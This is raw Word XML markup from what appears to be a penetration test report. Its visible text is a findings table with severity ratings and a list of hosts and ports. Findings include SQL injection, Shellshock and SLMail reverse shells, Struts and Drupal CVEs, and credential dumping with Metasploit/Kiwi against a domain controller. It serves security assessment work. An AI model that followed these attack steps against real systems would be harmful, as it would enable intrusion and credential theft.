        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8ak7h2xkf8o2" w:id="34"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_96i64bx7r747" w:id="35"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_679dv61xdibo" w:id="36"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lfcea0aczbxz" w:id="37"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wxo1xqcpasqd" w:id="38"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5fb4o283qxkf" w:id="39"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7qpxi162wm75" w:id="40"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pzwl041rl9tm" w:id="41"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dxfc4g54csm3" w:id="42"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_a65vy2nfvbeq" w:id="43"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cfhhjz91pgo" w:id="44"/>
      <w:bookmarkEnd w:id="44"/>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2"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tr5kilpcz7z8" w:id="45"/>
      <w:bookmarkEnd w:id="45"/>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75"/>
        <w:gridCol w:w="1485"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="7875"/>
            <w:gridCol w:w="1485"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="003366" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E5">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E6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity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Local File Inclusion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rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Local File Inclusion (With File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rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL Injection (Admin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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Poor Storage of Secure Credentials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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Poor Storage of Sensitive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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Command Line Injection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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">PHP Injection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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Aggressive Scan NMAP Results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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Nessus Scan Results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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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9">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Apache Tomcat Remote Code Execution Vulnerability (CVE-2017-12617)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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Shell Shock Reverse TCP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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Struts - CVE-2017-5638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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Drupal - CV-2019-6340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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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01">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Poor File Storage - Repo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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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03">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">NMAP Scan / Vulnerable Machines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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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05">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">FTP Connection / Anonymous Login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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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07">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SLMail SMTP POP3 Vulnerability / Reverse TCP Shell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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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09">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Dumping Creds Using Metasploit / Kiwi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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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0B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Gaining Access to WINDC01 Server using Dumped Credentials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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical </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0D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Traversal of WinDC01 Server to Dump More Credentials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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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0000ff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w: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XSS (Advanced)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XSS (Stored)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Sensitive Data Exposure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rPr>
                <w:color w:val="0000ff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="0000ff"/>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rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Open Source Exposed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rPr>
                <w:color w:val="0000ff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="0000ff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium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9">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">WHOIS Registry Exposure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rPr>
                <w:color w:val="6aa84f"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="6aa84f"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>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1E">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1F">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20">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21">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000122">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.14.35</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000123">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">3.33.130.190</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000124">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">15.197.148.33</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">192.168.13.1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000125">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.13.10</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000126">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.13.12</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000127">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.13.13</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000128">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.13.14</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000129">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">172.22.117.10</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">172.22.117.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="532" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">100001</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> 8009</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> 8080</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> 80</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000130">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> 22</w:t>
            </w:r>
          </w:p>
